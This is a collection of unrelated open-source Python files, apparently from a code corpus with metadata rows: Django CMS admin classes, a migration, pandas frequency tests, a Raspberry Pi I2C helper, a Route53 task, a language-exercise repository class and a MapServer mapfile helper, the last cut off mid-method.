raise ImproperlyConfigured('Error importing module %s: "%s"' % (module, e))
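# Illustrative use of the helper above (the dotted path is just an example):
# get_class_from_string('django.forms.Textarea') imports django.forms and
# returns its Textarea class, raising ImproperlyConfigured on failure.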
class ResourcePropertyInline(admin.TabularInline):
model = ResourceProperty
extra = 0
class FeinCMSModelAdmin(_feincms_tree_editor):
"""
A ModelAdmin to add changelist tree view and editing capabilities.
Requires FeinCMS to be installed.
"""
form = MPTTAdminForm
def _actions_column(self, obj):
actions = super(FeinCMSModelAdmin, self)._actions_column(obj)
actions.insert(0,
u'<a href="%s?%s=%s" title="%s">%s</a>' % (
urlresolvers.reverse('admin:HavelCMS_page_add'),
self.model._mptt_meta.parent_attr,
obj.pk,
_('+Page'),
_('+Page')))
actions.insert(0,
u'<a href="%s?%s=%s" title="%s">%s</a>' % (
urlresolvers.reverse('admin:HavelCMS_weblink_add'),
self.model._mptt_meta.parent_attr,
obj.pk,
_('+Weblink'),
_('+Weblink')))
return actions
def delete_selected_tree(self, modeladmin, request, queryset):
"""
Deletes multiple instances and makes sure the MPTT fields get recalculated properly.
(Because merely doing a bulk delete doesn't trigger the post_delete hooks.)
"""
n = 0
for obj in queryset:
obj.delete()
n += 1
self.message_user(request, _("Successfully deleted %s items.") % n)
def get_actions(self, request):
actions = super(FeinCMSModelAdmin, self).get_actions(request)
if 'delete_selected' in actions:
actions['delete_selected'] = (self.delete_selected_tree, 'delete_selected', _("Delete selected %(verbose_name_plural)s"))
return actions
def page_or_else(resource, code):
v = resource.get_translated_version(code)
if v is None:
return "-"
return v
class ResourceAdmin(FeinCMSModelAdmin):
list_display = ('__unicode__',
'title_link',
'is_published',
'in_menu',
'translation_pool',
'language',
'author')
list_filter = ('is_published', 'in_menu', 'author', 'language')
search_fields = ('title',)
inlines = (ResourcePropertyInline,)
actions = ('make_published', 'make_unpublished', 'link')
prepopulated_fields = {'slug': ('title',)}
ordering = ['tree_id', 'lft']
def __init__(self, *args, **kwargs):
super(ResourceAdmin, self).__init__(*args, **kwargs)
self.list_display_links = (None,)
def has_add_permission(self, request, obj=None):
return False
def title_link(self, obj):
return u'<a href="%s">%s</a>' % (obj.get_edit_link(),
obj.content_type)
title_link.allow_tags = True
title_link.short_description = _("Edit")
def make_do(self, request, queryset, label, *args, **make):
rows_updated = queryset.update(**make)
if rows_updated == 1:
message_bit = _("1 resource was")
else:
message_bit = _("%s resources were" % rows_updated)
self.message_user(request, _("%(num)s successfully %(action)s." % {'num': message_bit, 'action': label}))
def make_published(self, request, queryset):
return self.make_do(request, queryset, _("marked as published"),
is_published=True, published=datetime.datetime.now())
make_published.short_description = _("Mark selected resources as published")
def make_unpublished(self, request, queryset):
return self.make_do(request, queryset, _("marked as unpublished"),
is_published=False, published=None)
make_unpublished.short_description = _("Mark selected resources as unpublished")
def link(self, request, queryset):
rt = ResourceTranslation.objects.create()
for obj in queryset:
obj.translation_pool = rt
obj.save()
link.short_description = _("Link these resources as translation")
admin.site.register(Resource, ResourceAdmin)
class PageAdmin(FeinCMSModelAdmin):
list_display = ('mptt_title',
'is_published',
'in_menu',
'slug',
'language',
'author')
ordering = ('tree_id', 'lft')
list_filter = ('is_published', 'in_menu', 'author', 'language')
inlines = (ResourcePropertyInline, LinkInline, FileLinkInline)
prepopulated_fields = {'slug': ('title',)}
fieldsets = (
(None, {
'fields': ('parent', ('title', 'slug'), 'language', 'text', 'template')
}),
('Settings', {
'fields': ('in_menu', 'is_published', 'show_title')
}),
('Timing', {
'classes': ('collapse',),
'fields': ('published', 'unpublished')
}),
('Other', {
'classes': ('collapse',),
'fields': ('menu_title', 'meta_summary', 'noindex')
}),
)
def __init__(self, *args, **kwargs):
super(PageAdmin, self).__init__(*args, **kwargs)
setting = "RESOURCES_%s_TEXTWIDGET" % self.model._meta.model_name.upper()
if hasattr(settings, setting):
self.formfield_overrides = {
models.TextField: {'widget': get_class_from_string(getattr(settings, setting)) }
}
overrides = FORMFIELD_FOR_DBFIELD_DEFAULTS.copy()
overrides.update(self.formfield_overrides)
self.formfield_overrides = overrides
setting = "RESOURCES_%s_INLINES" % self.model._meta.model_name.upper()
if hasattr(settings, setting):
self.inlines = list(self.inlines)
for i in getattr(settings, setting):
self.inlines.append(get_class_from_string(i))
def save_model(self, request, obj, form, change):
if getattr(obj, 'author', None) is None:
obj.author = request.user
obj.save()
admin.site.register(Page, PageAdmin)
class WeblinkAdmin(ResourceAdmin):
def __init__(self, *args, **kwargs):
super(WeblinkAdmin, self).__init__(*args, **kwargs)
setting = "RESOURCES_%s_INLINES" % self.model._meta.model_name.upper()
if hasattr(settings, setting):
self.inlines = list(self.inlines)
for i in getattr(settings, setting):
self.inlines.append(get_class_from_string(i))
def has_add_permission(self, request, obj=None):
return True
admin.site.register(Weblink, WeblinkAdmin)
class ResourceCollectionItemInline(admin.TabularInline):
model = ResourceCollectionItem
class ResourceCollectionAdmin(admin.ModelAdmin):
inlines = (ResourceCollectionItemInline,)
admin.site.register(ResourceCollection, ResourceCollectionAdmin)
admin.site.register(File)
| bsd-3-clause | -1,609,924,798,894,494,700 | 34.426009 | 133 | 0.599114 | false |
lecovi/reveal.js | archivos/encapsulamiento_property.py | 1 | 1041 | class Encapsulamiento:
""" Esta clase tiene 3 atributos y 3 métodos propios.
>>> # El atributo privado es accesible a través de una Propiedad.
>>> x = Encapsulamiento()
>>> x.atributo_publico
este atributo es privado.
>>> x._atributo_semi_privado
este atributo es 'casi' privado.
>>> x.atributo_privado
este atributo es privado.
"""
def __init__(self):
self.__atributo_privado = "este atributo es privado."
self._atributo_semi_privado = "este atributo es 'casi' privado."
self.atributo_publico = "este atributo es público."
def publico(self):
return "Este es un método Público"
def _semi_privado(self):
return "Este es un método Semi Privado"
def __privado(self):
return "Este es un método Privado"
@property
def atributo_privado(self):
return self.__atributo_privado
@atributo_privado.setter
def atributo_privado(self, valor):
self.__atributo_privado = valor
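    # Quick illustration (not part of the original lesson): assignment goes
    # through the property setter above instead of touching the name-mangled
    # attribute directly.
    # e = Encapsulamiento()
    # e.atributo_privado = "nuevo valor"
    # e.atributo_privado        # -> 'nuevo valor'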
| mit | -8,376,594,411,097,522,000 | 30.333333 | 73 | 0.619923 | false |
pashinin-com/pashinin.com | src/ege/migrations/0006_auto_20170217_1608.py | 1 | 1323 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-02-17 13:08
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('edu', '0007_auto_20170217_1434'),
('ege', '0005_auto_20170129_0117'),
]
operations = [
migrations.CreateModel(
name='Task',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('type', models.IntegerField(choices=[(0, '1 единственная задача'), (1, '1 задача из N на выбор')], default=0, verbose_name='Нужно решить')),
('order', models.IntegerField(verbose_name='Номер задачи в экзамене, например от 1 до 27')),
('tags', models.ManyToManyField(help_text='Все тэги, которые подходят для этой задачи в этом экзамене', related_name='ege_tasks', to='edu.Category', verbose_name='Tags')),
],
),
migrations.AddField(
model_name='ege',
name='tasks',
field=models.ManyToManyField(blank=True, related_name='exams', to='ege.Task'),
),
]
| gpl-3.0 | 364,146,395,202,600,960 | 38.966667 | 187 | 0.593828 | false |
MJuddBooth/pandas | pandas/tests/tseries/frequencies/test_freq_code.py | 1 | 4707 | import pytest
from pandas._libs.tslibs import frequencies as libfrequencies, resolution
from pandas._libs.tslibs.frequencies import (
FreqGroup, _period_code_map, get_freq, get_freq_code)
import pandas.compat as compat
import pandas.tseries.offsets as offsets
@pytest.fixture(params=list(compat.iteritems(_period_code_map)))
def period_code_item(request):
return request.param
@pytest.mark.parametrize("freqstr,expected", [
("A", 1000), ("3A", 1000), ("-1A", 1000),
("Y", 1000), ("3Y", 1000), ("-1Y", 1000),
("W", 4000), ("W-MON", 4001), ("W-FRI", 4005)
])
def test_freq_code(freqstr, expected):
assert get_freq(freqstr) == expected
def test_freq_code_match(period_code_item):
freqstr, code = period_code_item
assert get_freq(freqstr) == code
@pytest.mark.parametrize("freqstr,expected", [
("A", 1000), ("3A", 1000), ("-1A", 1000), ("A-JAN", 1000),
("A-MAY", 1000), ("Y", 1000), ("3Y", 1000), ("-1Y", 1000),
("Y-JAN", 1000), ("Y-MAY", 1000), (offsets.YearEnd(), 1000),
(offsets.YearEnd(month=1), 1000), (offsets.YearEnd(month=5), 1000),
("W", 4000), ("W-MON", 4000), ("W-FRI", 4000), (offsets.Week(), 4000),
(offsets.Week(weekday=1), 4000), (offsets.Week(weekday=5), 4000),
("T", FreqGroup.FR_MIN),
])
def test_freq_group(freqstr, expected):
assert resolution.get_freq_group(freqstr) == expected
def test_freq_group_match(period_code_item):
freqstr, code = period_code_item
str_group = resolution.get_freq_group(freqstr)
code_group = resolution.get_freq_group(code)
assert str_group == code_group == code // 1000 * 1000
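# For intuition, using the parametrized values above: get_freq("W-MON") is
# 4001, and its frequency group is 4001 // 1000 * 1000 == 4000.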
@pytest.mark.parametrize("freqstr,exp_freqstr", [
("D", "D"), ("W", "D"), ("M", "D"),
("S", "S"), ("T", "S"), ("H", "S")
])
def test_get_to_timestamp_base(freqstr, exp_freqstr):
tsb = libfrequencies.get_to_timestamp_base
assert tsb(get_freq_code(freqstr)[0]) == get_freq_code(exp_freqstr)[0]
_reso = resolution.Resolution
@pytest.mark.parametrize("freqstr,expected", [
("A", "year"), ("Q", "quarter"), ("M", "month"),
("D", "day"), ("H", "hour"), ("T", "minute"),
("S", "second"), ("L", "millisecond"),
("U", "microsecond"), ("N", "nanosecond")
])
def test_get_str_from_freq(freqstr, expected):
assert _reso.get_str_from_freq(freqstr) == expected
@pytest.mark.parametrize("freq", ["A", "Q", "M", "D", "H",
"T", "S", "L", "U", "N"])
def test_get_freq_roundtrip(freq):
result = _reso.get_freq(_reso.get_str_from_freq(freq))
assert freq == result
@pytest.mark.parametrize("freq", ["D", "H", "T", "S", "L", "U"])
def test_get_freq_roundtrip2(freq):
result = _reso.get_freq(_reso.get_str(_reso.get_reso_from_freq(freq)))
assert freq == result
@pytest.mark.parametrize("args,expected", [
((1.5, "T"), (90, "S")), ((62.4, "T"), (3744, "S")),
((1.04, "H"), (3744, "S")), ((1, "D"), (1, "D")),
((0.342931, "H"), (1234551600, "U")), ((1.2345, "D"), (106660800, "L"))
])
def test_resolution_bumping(args, expected):
# see gh-14378
assert _reso.get_stride_from_decimal(*args) == expected
@pytest.mark.parametrize("args", [
(0.5, "N"),
# Too much precision in the input can prevent.
(0.3429324798798269273987982, "H")
])
def test_cat(args):
msg = "Could not convert to integer offset at any resolution"
with pytest.raises(ValueError, match=msg):
_reso.get_stride_from_decimal(*args)
@pytest.mark.parametrize("freq_input,expected", [
# Frequency string.
("A", (get_freq("A"), 1)),
("3D", (get_freq("D"), 3)),
("-2M", (get_freq("M"), -2)),
# Tuple.
(("D", 1), (get_freq("D"), 1)),
(("A", 3), (get_freq("A"), 3)),
(("M", -2), (get_freq("M"), -2)),
((5, "T"), (FreqGroup.FR_MIN, 5)),
# Numeric Tuple.
((1000, 1), (1000, 1)),
# Offsets.
(offsets.Day(), (get_freq("D"), 1)),
(offsets.Day(3), (get_freq("D"), 3)),
(offsets.Day(-2), (get_freq("D"), -2)),
(offsets.MonthEnd(), (get_freq("M"), 1)),
(offsets.MonthEnd(3), (get_freq("M"), 3)),
(offsets.MonthEnd(-2), (get_freq("M"), -2)),
(offsets.Week(), (get_freq("W"), 1)),
(offsets.Week(3), (get_freq("W"), 3)),
(offsets.Week(-2), (get_freq("W"), -2)),
(offsets.Hour(), (FreqGroup.FR_HR, 1)),
# Monday is weekday=0.
(offsets.Week(weekday=1), (get_freq("W-TUE"), 1)),
(offsets.Week(3, weekday=0), (get_freq("W-MON"), 3)),
(offsets.Week(-2, weekday=4), (get_freq("W-FRI"), -2)),
])
def test_get_freq_code(freq_input, expected):
assert get_freq_code(freq_input) == expected
def test_get_code_invalid():
with pytest.raises(ValueError, match="Invalid frequency"):
get_freq_code((5, "baz"))
| bsd-3-clause | -5,491,830,421,126,756,000 | 30.590604 | 75 | 0.579137 | false |
tweakyllama/Arduino-Projects | I2C/src/raspberry.py | 1 | 1938 | import time
import smbus
class I2C(object):
@staticmethod
def getPiVersion():
"Gets the version number of the Pi board"
try:
with open('/proc/cpuinfo', 'r') as infile:
for line in infile:
          # Match a line of the form "Revision : 0002" while ignoring extra
          # info in front of the revision (like 1000 when the Pi was over-volted).
match = re.match('Revision\s+:\s+.*(\w{4})$', line)
if match and match.group(1) in ['0000', '0002', '0003']:
# Return revision 1 if revision ends with 0000, 0002 or 0003.
return 1
elif match:
# Assume revision 2 if revision ends with any other 4 chars.
return 2
return 0
except:
return 0
@staticmethod
def getI2CBusNumber():
return 1 if I2C.getPiVersion() > 1 else 0
def __init__(self, address, busnum = -1, debug = False):
self.address = address
# By default, the correct I2C bus is auto-detected using /proc/cpuinfo
# Alternatively, you can hard-code the bus version below:
# self.bus = smbus.SMBus(0); # Force I2C0 (early 256MB Pi's)
# self.bus = smbus.SMBus(1); # Force I2C1 (512MB Pi's)
    self.bus = smbus.SMBus(busnum if busnum >= 0 else I2C.getI2CBusNumber())
self.debug = debug
def reverseByteOrder(self, data):
"Reverses the byte order of an int (16-bit) or a long (32-bit)"
# Courtesy Vishal Sapre
byteCount = len(hex(data)[2:].replace('L','')[::2])
val = 0
for i in range(byteCount):
val = (val << 8) | (data & 0xff)
data >>= 8
return val
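  # Worked example for the method above (assumed 16-bit value):
  # reverseByteOrder(0x1234) -> 0x3412.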
def errMsg(self):
print "Error accessing 0x%02X: Check your I2C address" % self.address
return -1
def write8(self, reg, value):
"Writes an 8-bit value to specified register/address"
try:
self.bus.write_byte_data(self.address, reg, value)
except IOError, err:
return self.errMsg()
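  # Hypothetical session (bus address and register are placeholders):
  #   dev = I2C(0x48)
  #   dev.write8(0x01, 0xFF)   # write 0xFF to register 0x01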
| gpl-2.0 | 7,011,148,986,396,381,000 | 32.413793 | 87 | 0.615067 | false |
joshbuddy/crew | pitcrew/tasks/ensure/aws/route53/has_records.py | 1 | 1339 | import json
import asyncio
from pitcrew import task
@task.arg("zone_id", desc="The zone id to operate on", type=str)
@task.arg("records", desc="A list of records to ensure are set", type=list)
class HasRecords(task.BaseTask):
"""Ensure route53 has the set of records"""
async def verify(self):
json_out = await self.sh(
f"aws route53 list-resource-record-sets --hosted-zone-id {self.params.esc_zone_id}"
)
out = json.loads(json_out)
existing_record_sets = out["ResourceRecordSets"]
for record in self.params.records:
assert record in existing_record_sets, "cannot find record"
async def run(self):
changes = map(
lambda c: {"Action": "UPSERT", "ResourceRecordSet": c}, self.params.records
)
change_batch = {"Changes": list(changes)}
change_id = json.loads(
await self.sh(
f"aws route53 change-resource-record-sets --hosted-zone-id {self.params.esc_zone_id} --change-batch {self.esc(json.dumps(change_batch))}"
)
)["ChangeInfo"]["Id"]
while (
json.loads(
await self.sh(f"aws route53 get-change --id {self.esc(change_id)}")
)["ChangeInfo"]["Status"]
== "PENDING"
):
await asyncio.sleep(5)
| mit | 3,340,604,327,670,191,000 | 36.194444 | 153 | 0.589246 | false |
niavok/perroquet | perroquetlib/repository/exercise_repository_exercise.py | 1 | 15308 | #! /usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (C) 2009-2011 Frédéric Bertolus.
# Copyright (C) 2009-2011 Matthieu Bizien.
#
# This file is part of Perroquet.
#
# Perroquet is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Perroquet is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Perroquet. If not, see <http://www.gnu.org/licenses/>.
import errno
import gettext
import logging
import os
import tarfile
import tempfile
import thread
import urllib2
from threading import Lock
from xml.dom.minidom import getDOMImplementation, parse
from perroquetlib.debug import defaultLoggingHandler, defaultLoggingLevel
_ = gettext.gettext
class ExerciseRepositoryExercise:
def __init__(self):
self.id = "no-id"
self.name = "No name"
self.description = ""
self.mutexInstalling = Lock()
self.downloadPercent = 0
self.state = "none"
self.wordsCount = 0
self.translationList = []
self.version = None
self.logger = logging.Logger("ExerciseRepositoryExercise")
self.logger.setLevel(defaultLoggingLevel)
self.logger.addHandler(defaultLoggingHandler)
self.licence = _("Not specified")
self.author = _("Not specified")
self.authorWebsite = _("Not specified")
self.authorContact = _("Not specified")
self.packager = _("Not specified")
self.packagerWebsite = _("Not specified")
self.packagerContact = _("Not specified")
self.language = _("Not specified")
self.mediaType = _("Not specified")
self.filePath = _("Not specified")
self.system = False
def set_system(self, system):
"""Define if the exo is a system exo or only a local one
A system exo store common data in a system directory and only the
progress in the local directory
"""
self.system = system
def is_installed(self):
return os.path.isfile(self.get_template_path())
def is_used(self):
return os.path.isfile(self.get_instance_path())
def is_done(self):
return os.path.isfile(self.get_done_path())
def start_install(self):
self.mutexInstalling.acquire()
self.canceled = False
self.downloadPercent = 0
self.play_thread_id = thread.start_new_thread(self.install_thread, ())
def cancel_install(self):
self.canceled = True
def wait_install_end(self):
self.mutexInstalling.acquire()
self.mutexInstalling.release()
def download(self):
f = urllib2.urlopen(self.get_file_path())
        fd, tempPath = tempfile.mkstemp("", "perroquet-")
        os.close(fd)
        wf = open(tempPath, 'w+b')
size = f.info().get('Content-Length')
if size is None:
size = 0
else:
size = int(size)
        count = 0
        sizeToRead = 50000
        while not self.canceled:
            data = f.read(sizeToRead)
            wf.write(data)
            if len(data) != sizeToRead:
                break
            count += sizeToRead
            if size > 0:
                self.downloadPercent = (round((float(count) / float(size)) * 100))
        self.downloading = False
        wf.close()
        f.close()
        return tempPath
def get_download_percent(self):
return self.downloadPercent
def get_state(self):
#available
#downloading
#installing
#installed
#corrupted
#canceled
#removing
#used
#done
if self.state == "none":
if self.is_done():
self.state = "done"
elif self.is_used():
self.state = "used"
elif self.is_installed():
self.state = "installed"
else:
self.state = "available"
return self.state
def set_state(self, state):
oldState = self.state
self.state = state
self.notifyStateChange(oldState, self.callbackData)
def set_state_change_callback(self, callback, callbackData):
self.notifyStateChange = callback
self.callbackData = callbackData
def install_thread(self):
self.set_state("downloading")
tmpPath = self.download()
if self.canceled:
self.logger.info("remove temp file")
self.set_state("canceled")
os.remove(tmpPath)
else:
self.set_state("installing")
tar = tarfile.open(tmpPath)
outPath = self.get_local_path()
try:
os.makedirs(outPath)
except OSError, (ErrorNumber, ErrorMessage): # Python <=2.5
if ErrorNumber == errno.EEXIST:
pass
else: raise
tar.extractall(outPath)
tar.close()
os.remove(tmpPath)
if self.is_installed():
self.set_state("installed")
else:
self.set_state("corrupted")
self.mutexInstalling.release()
def get_template_path(self):
return os.path.join(self.get_local_path(), "template.perroquet")
def get_instance_path(self):
return os.path.join(self.get_personnal_local_path(), "instance.perroquet")
def get_done_path(self):
return os.path.join(self.get_personnal_local_path(), "done.perroquet")
def set_name(self, name):
self.name = name
def get_name(self):
return self.name
def set_id(self, id):
self.id = id
def get_id(self):
return self.id
def set_description(self, description):
self.description = description
def get_description(self):
return self.description
def set_licence(self, licence):
self.licence = licence
def get_licence(self):
return self.licence
def set_language(self, language):
self.language = language
def get_language(self):
return self.language
def set_media_type(self, mediaType):
self.mediaType = mediaType
def get_media_type(self):
return self.mediaType
def set_version(self, version):
self.version = version
def get_version(self):
return self.version
def set_author(self, author):
self.author = author
def get_author(self):
return self.author
def set_words_count(self, wordsCount):
self.wordsCount = wordsCount
def get_words_count(self):
return self.wordsCount
def set_author_website(self, authorWebsite):
self.authorWebsite = authorWebsite
def get_author_website(self):
return self.authorWebsite
def set_author_contact(self, authorContact):
self.authorContact = authorContact
def get_author_contact(self):
return self.authorContact
def set_packager(self, packager):
self.packager = packager
def get_packager(self):
return self.packager
def set_packager_website(self, packagerWebsite):
self.packagerWebsite = packagerWebsite
def get_packager_website(self):
return self.packagerWebsite
def set_packager_contact(self, packagerContact):
self.packagerContact = packagerContact
def get_packager_contact(self):
return self.packagerContact
def set_file_path(self, filePath):
self.filePath = filePath
def get_file_path(self):
return self.filePath
def set_translations_list(self, translationList):
self.translationList = translationList
def get_translations_list(self):
return self.translationList
def set_parent(self, parent):
self.parent = parent
def get_local_path(self):
versioned_id = None
if self.version is not None:
versioned_id = self.id + "_" + self.version
else:
versioned_id = self.id
return os.path.join(self.parent.get_local_path(), versioned_id)
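    # e.g. an exercise with id "lesson" and version "1.2" resolves to
    # <repository local path>/lesson_1.2 (names are illustrative).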
def get_personnal_local_path(self):
versioned_id = None
if self.version is not None:
versioned_id = self.id + "_" + self.version
else:
versioned_id = self.id
return os.path.join(self.parent.get_personal_local_path(), versioned_id)
def parse_description(self, xml_exercise):
self.set_name(self._get_text(xml_exercise.getElementsByTagName("name")[0].childNodes))
self.set_id(self._get_text(xml_exercise.getElementsByTagName("id")[0].childNodes))
self.set_description(self._get_text(xml_exercise.getElementsByTagName("description")[0].childNodes))
self.set_licence(self._get_text(xml_exercise.getElementsByTagName("licence")[0].childNodes))
self.set_language(self._get_text(xml_exercise.getElementsByTagName("language")[0].childNodes))
self.set_media_type(self._get_text(xml_exercise.getElementsByTagName("media_type")[0].childNodes))
self.set_version(self._get_text(xml_exercise.getElementsByTagName("exercise_version")[0].childNodes))
self.set_author(self._get_text(xml_exercise.getElementsByTagName("author")[0].childNodes))
self.set_author_website(self._get_text(xml_exercise.getElementsByTagName("author_website")[0].childNodes))
self.set_author_contact(self._get_text(xml_exercise.getElementsByTagName("author_contact")[0].childNodes))
self.set_packager(self._get_text(xml_exercise.getElementsByTagName("packager")[0].childNodes))
self.set_packager_website(self._get_text(xml_exercise.getElementsByTagName("packager_website")[0].childNodes))
self.set_packager_contact(self._get_text(xml_exercise.getElementsByTagName("packager_contact")[0].childNodes))
if len(xml_exercise.getElementsByTagName("words_count")) > 0:
self.set_words_count(self._get_text(xml_exercise.getElementsByTagName("words_count")[0].childNodes))
if len(xml_exercise.getElementsByTagName("file")) > 0:
self.set_file_path(self._get_text(xml_exercise.getElementsByTagName("file")[0].childNodes))
if len(xml_exercise.getElementsByTagName("translations")) > 0:
xml_translations = xml_exercise.getElementsByTagName("translations")[0]
translationList = []
for xml_translation in xml_translations.getElementsByTagName("translation"):
translationList.append(self._get_text(xml_translation.childNodes))
self.set_translations_list(translationList)
def generate_description(self):
self._generate_description()
def _generate_description(self):
if not os.path.isdir(self.get_local_path()):
try:
os.makedirs(self.get_local_path())
except OSError, (ErrorNumber, ErrorMessage): # Python <=2.5
            if ErrorNumber == errno.EEXIST:
pass
else: raise
impl = getDOMImplementation()
newdoc = impl.createDocument(None, "perroquet_exercise", None)
root_element = newdoc.documentElement
# Name
xml_name = newdoc.createElement("name")
xml_name.appendChild(newdoc.createTextNode(self.get_name()))
root_element.appendChild(xml_name)
# Id
xml_id = newdoc.createElement("id")
xml_id.appendChild(newdoc.createTextNode(self.get_id()))
root_element.appendChild(xml_id)
# Description
xml_description = newdoc.createElement("description")
xml_description.appendChild(newdoc.createTextNode(self.get_description()))
root_element.appendChild(xml_description)
# Words count
xml_version = newdoc.createElement("words_count")
xml_version.appendChild(newdoc.createTextNode(str(self.get_words_count())))
root_element.appendChild(xml_version)
# Version
xml_version = newdoc.createElement("exercise_version")
xml_version.appendChild(newdoc.createTextNode(self.get_version()))
root_element.appendChild(xml_version)
# Licence
xml_node = newdoc.createElement("licence")
xml_node.appendChild(newdoc.createTextNode(self.get_licence()))
root_element.appendChild(xml_node)
# Language
xml_node = newdoc.createElement("language")
xml_node.appendChild(newdoc.createTextNode(self.get_language()))
root_element.appendChild(xml_node)
# Media type
xml_node = newdoc.createElement("media_type")
xml_node.appendChild(newdoc.createTextNode(self.get_media_type()))
root_element.appendChild(xml_node)
# author
xml_node = newdoc.createElement("author")
xml_node.appendChild(newdoc.createTextNode(self.get_author()))
root_element.appendChild(xml_node)
# author website
xml_node = newdoc.createElement("author_website")
xml_node.appendChild(newdoc.createTextNode(self.get_author_website()))
root_element.appendChild(xml_node)
# author contact
xml_node = newdoc.createElement("author_contact")
xml_node.appendChild(newdoc.createTextNode(self.get_author_contact()))
root_element.appendChild(xml_node)
# packager
xml_node = newdoc.createElement("packager")
xml_node.appendChild(newdoc.createTextNode(self.get_packager()))
root_element.appendChild(xml_node)
# packager website
xml_node = newdoc.createElement("packager_website")
xml_node.appendChild(newdoc.createTextNode(self.get_packager_website()))
root_element.appendChild(xml_node)
# packager contact
xml_node = newdoc.createElement("packager_contact")
xml_node.appendChild(newdoc.createTextNode(self.get_packager_contact()))
root_element.appendChild(xml_node)
# template path
xml_node = newdoc.createElement("template")
xml_node.appendChild(newdoc.createTextNode(self.get_template_path()))
root_element.appendChild(xml_node)
# translation
#TODO
xml_string = newdoc.toprettyxml()
xml_string = xml_string.encode('utf8')
repoDescriptionPath = os.path.join(self.get_local_path(), "exercise.xml")
f = open(repoDescriptionPath, 'w')
f.write(xml_string)
f.close()
def init_from_path(self, exercisePath):
exerciseDescriptionPath = os.path.join(exercisePath, "exercise.xml")
if os.path.isfile(exerciseDescriptionPath):
f = open(exerciseDescriptionPath, 'r')
dom = parse(f)
self.parse_description(dom)
else:
self.id = os.path.basename(exercisePath)
self.name = self.id
self.description = gettext.gettext("Imported exercise")
def _get_text(self, nodelist):
rc = ""
for node in nodelist:
if node.nodeType == node.TEXT_NODE:
rc = rc + node.data
rc = rc.strip()
return rc
| gpl-3.0 | 3,889,338,079,324,293,000 | 32.346405 | 118 | 0.633281 | false |
slub/vk2-georeference | georeference/utils/process/mapfile.py | 1 | 4870 | # -*- coding: utf-8 -*-
'''
Copyright (c) 2015 Jacob Mendt
Created on 04.08.15
@author: mendt
'''
import os
import uuid
from mapscript import MS_IMAGEMODE_RGB, MS_OFF, MS_PIXELS, MS_LAYER_RASTER, layerObj, mapObj, MS_ON, outputFormatObj
from georeference.utils.exceptions import MapfileBindingInitalizationException
OutputFormat_JPEG = {"NAME":"jpeg","MIMETYPE":"image/jpeg","DRIVER":"AGG/JPEG","EXTENSION":"jpg",
"IMAGEMODE":MS_IMAGEMODE_RGB,"TRANSPARENT":MS_OFF}
Metadata = {"wms_srs":"EPSG:4326","wms_onlineresource":"http://localhost/cgi-bin/mapserv?",
"wms_enable_request":"*","wms_titel":"Temporary Messtischblatt WMS"}
def createMapfile(layername, datapath, georefTargetSRS, mapfileTemplate, mapfileDir, mapfileParams):
""" Function creates a temporary mapfile
:type layername: str
:type datapath: str
:type georefTargetSRS: int
:type mapfileTemplate: str
:type mapfileDir: str
    :type mapfileParams: dict """
try:
mapfile = MapfileBinding(mapfileTemplate,mapfileDir, **mapfileParams)
mapfile.addLayerToMapfile(datapath, layername, georefTargetSRS)
wms = mapfile.saveMapfile()
return wms
except:
raise
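# Illustrative call (paths, layer name and SRS are placeholders):
# createMapfile("mtb_0010", "/data/georef/mtb_0010.tif", 4326,
#               "/srv/mapserver/template.map", "/srv/mapserver/tmp",
#               {"METADATA": Metadata})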
class MapfileBinding:
def __init__(self, src_mapfilePath, dest_mapfileFolder, **kwargs):
# init wms service name
self.servicename= "wms_%s.map"%uuid.uuid4()
# init the mapfile based on a template file
self.mapfilepath = os.path.join(dest_mapfileFolder, self.servicename)
self.__initMapfile__(src_mapfilePath, self.mapfilepath)
if len(kwargs) > 0:
self.__initMapfileParameter__(kwargs)
else:
raise MapfileBindingInitalizationException("Missing mapfile information!")
def __initMapfile__(self, src_mapfilePath, dest_mapfilePath):
mapfile = mapObj(src_mapfilePath)
self.saveMapfile(mapfile)
self.mapfile = mapObj(self.mapfilepath)
def __initMapfileParameter__(self, kwargs):
"""
Set the option parameter for the map element
"""
#generic mapfile options
self.mapfile.units = MS_PIXELS
self.mapfile.status = MS_ON
#if "OUTPUTFORMAT" in kwargs:
# self.__addOutputFormat__(kwargs["OUTPUTFORMAT"])
if "METADATA" in kwargs:
self.__addMetadata__(kwargs["METADATA"])
def __addMetadata__(self, dictMD):
self.wms_url = dictMD["wms_onlineresource"]+"map=%s"%self.mapfilepath
for key in dictMD:
if key is "wms_onlineresource":
self.mapfile.web.metadata.set(key,self.wms_url)
else:
self.mapfile.web.metadata.set(key,dictMD[key])
def __addOutputFormat__(self, dictOutFormat):
"""
        Function adds an outputformat object to the mapfile.
        @param dictOutFormat: Represents a dictionary with the outputformat
        arguments. It should contain the keys:
@param NAME:
@param MIMETYPE:
@param DRIVER:
@param EXTENSION:
@param IMAGEMODE:
@param TRANSPARENT:
"""
# creates a OutputFormatObject and adds the parameter to it
if "DRIVER" in dictOutFormat:
outFormatObj = outputFormatObj(dictOutFormat["DRIVER"])
else:
raise MapfileBindingInitalizationException("Missing Driver for OutputFormat Element")
if "NAME" in dictOutFormat:
outFormatObj.name = dictOutFormat["NAME"]
if "MIMETYPE" in dictOutFormat:
outFormatObj.mimetype = dictOutFormat["MIMETYPE"]
if "EXTENSION" in dictOutFormat:
outFormatObj.extension = dictOutFormat["EXTENSION"]
if "IMAGEMODE" in dictOutFormat:
outFormatObj.imagemode = dictOutFormat["IMAGEMODE"]
if "TRANSPARENT" in dictOutFormat:
outFormatObj.transparent = dictOutFormat["TRANSPARENT"]
# adds the OutputFormatObject to the mapfile
self.mapfile.appendOutputFormat(outFormatObj)
def saveMapfile(self, mapfile = None):
if mapfile != None and isinstance(mapfile,mapObj):
mapfile.save(self.mapfilepath)
return None
else:
self.mapfile.save(self.mapfilepath)
return self.mapfile.getMetaData("wms_onlineresource")
def addLayerToMapfile(self, dataPath, layerName,georefTargetSRS):
""" Function adds a layer to a mapfile
:type dataPath: str
:type layerName: str
:type georefTargetSRS: int """
layer = layerObj()
layer.data = dataPath
